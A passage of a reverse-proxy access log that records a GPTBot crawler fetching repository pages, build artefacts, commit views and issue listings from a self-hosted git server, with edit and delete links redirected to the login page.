10032] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:19:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11289] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:19:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:19:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 492247] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2" -[17/Feb/2026:19:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 474262] [Gzip 19.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3" -[17/Feb/2026:19:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 493045] [Gzip 19.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1" -[17/Feb/2026:19:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=source" [Client 74.7.227.38] [Length 12864] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.6_Final.spec" -[17/Feb/2026:19:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=source" [Client 74.7.227.38] [Length 12864] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor_v3.5_Final.spec" -[17/Feb/2026:19:02:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:19:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:19:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:19:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:02:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:02:27 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:02:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:02:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 819487] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 819599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 9815] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 722593] [Gzip 27.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 788394] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 750184] [Gzip 27.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" [Client 74.7.227.38] [Length 749710] [Gzip 27.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/xref-GoldMonitor_V5.2.html" -[17/Feb/2026:19:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/xref-GoldMonitor_V5.1.html" -[17/Feb/2026:19:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11072] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11301] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:19:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:19:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11148] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11158] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:02:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" -[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:19:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:19:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:19:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11325] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" -[17/Feb/2026:19:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 